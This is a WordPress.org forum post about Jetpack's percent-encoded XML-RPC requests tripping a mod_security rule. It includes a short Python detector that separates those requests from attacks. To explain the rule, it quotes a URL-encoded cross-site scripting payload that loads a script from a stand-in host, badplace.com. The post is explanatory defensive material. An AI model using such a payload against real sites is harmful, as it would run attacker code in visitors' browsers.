Channel: WordPress.org Forums » [Jetpack - WP Security, Backup, Speed, & Growth] Support

Marcelo Pedra on "[Plugin: Jetpack by WordPress.com] Automattic's IP range to whitelist in firewall"


OK Ben, hope to hear from you all soon.

In the meantime, I was googling and reading about this, and there are a lot of opinions regarding when you are abusing URL encoding and, on the other hand, what may be considered a false positive.

The problem for the mod_security rule is that the requests coming from your server are abusing URL encoding (overuse of the % character):

/xmlrpc.php?for=jetpack&token=UDynqyk%28KhOa5IVz%40qFcr%246N4KCe7%25KP%3A1%3A1&timestamp=1391327747&nonce=Tzsb9ZWduZ&body-hash=8leichwVzcK9QXEh0Tsy6MnFcAY%3D&signature=RcNRr2yuXyHc52ZFPKQ7D7lrQY8%3D HTTP/1.1

Although you may have many good reasons for some Jetpack system to launch pings using that command line, the purpose of this mod_security rule is to detect misuse and abuse of RFC 2396 and protect against things like this type of cross-site scripting:

Excerpt from an arbitrary web page - "getdata.php": echo $HTTP_GET_VARS["data"];

URL-encoded attack: http://target/getdata.php?data=%3cscript%20src=%22http%3a%2f%2fwww.badplace.com%2fnasty.js%22%3e%3c%2fscript%3e

HTML execution: <script src="http://www.badplace.com/nasty.js"></script>

That's why YOUR server looks suspicious to mod_security.

Source: http://www.technicalinfo.net/papers/URLEmbeddedAttacks.html
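As an added illustration (not code from the post, from Jetpack or from ModSecurity), this Python script runs both request targets quoted above through a two-stage check: a raw percent-encoding ratio of the kind that trips on the Jetpack ping, then an inspection of the decoded parameter values, which is what actually separates the signed token from the script tag. The 10% threshold, the function names and the verdict labels are assumptions; the `&timestamp` parameter is restored from the entity-mangled line in the post.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# The two request targets from the post above: Jetpack's XML-RPC ping (with the
# entity-mangled "&timestamp" restored) and the cited paper's XSS sample.
JETPACK_REQ = ("/xmlrpc.php?for=jetpack&token=UDynqyk%28KhOa5IVz%40qFcr%246N4KCe7%25KP%3A1%3A1"
               "&timestamp=1391327747&nonce=Tzsb9ZWduZ&body-hash=8leichwVzcK9QXEh0Tsy6MnFcAY%3D"
               "&signature=RcNRr2yuXyHc52ZFPKQ7D7lrQY8%3D")
XSS_REQ = ("/getdata.php?data=%3cscript%20src=%22http%3a%2f%2fwww.badplace.com"
           "%2fnasty.js%22%3e%3c%2fscript%3e")

ESCAPE_RE = re.compile(r"%[0-9A-Fa-f]{2}")          # well-formed %XX escape
BAD_ESCAPE_RE = re.compile(r"%(?![0-9A-Fa-f]{2})")  # '%' not followed by two hex digits
TAG_RE = re.compile(r"<\s*/?\s*[a-z]", re.IGNORECASE)  # HTML tag opener in decoded text

def query_of(request_target: str) -> str:
    """Query string portion of a request target such as '/x.php?a=1'."""
    return urlsplit(request_target).query

def count_escapes(query: str) -> int:
    """Number of well-formed %XX escapes in the raw (undecoded) query."""
    return len(ESCAPE_RE.findall(query))

def encoded_ratio(query: str) -> float:
    """Share of raw query characters that belong to a %XX escape (0.0 to 1.0)."""
    return 3 * count_escapes(query) / len(query) if query else 0.0

def has_invalid_escape(query: str) -> bool:
    """Malformed encoding (e.g. '%zz'), a different signal from merely heavy use."""
    return BAD_ESCAPE_RE.search(query) is not None

def decodes_to_markup(query: str) -> bool:
    """True if any parameter value, once percent-decoded, contains a tag opener."""
    return any(TAG_RE.search(value) for _, value in parse_qsl(query, keep_blank_values=True))

def classify(request_target: str, ratio_threshold: float = 0.10) -> str:
    """Stage 1 looks at raw encoding density; stage 2 at what the values decode to."""
    query = query_of(request_target)
    if has_invalid_escape(query) or decodes_to_markup(query):
        return "block"
    if encoded_ratio(query) >= ratio_threshold:
        return "encoded-but-clean"  # heavy encoding, harmless content: allow-list candidate
    return "allow"

if __name__ == "__main__":
    for label, req in (("jetpack", JETPACK_REQ), ("xss", XSS_REQ)):
        q = query_of(req)
        print(f"{label}: escapes={count_escapes(q)} ratio={encoded_ratio(q):.2f} -> {classify(req)}")
```

Both requests exceed the raw-encoding threshold, which is exactly why an encoding-density rule alone cannot tell the Jetpack token apart from the script tag; only the decoded-value inspection does.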
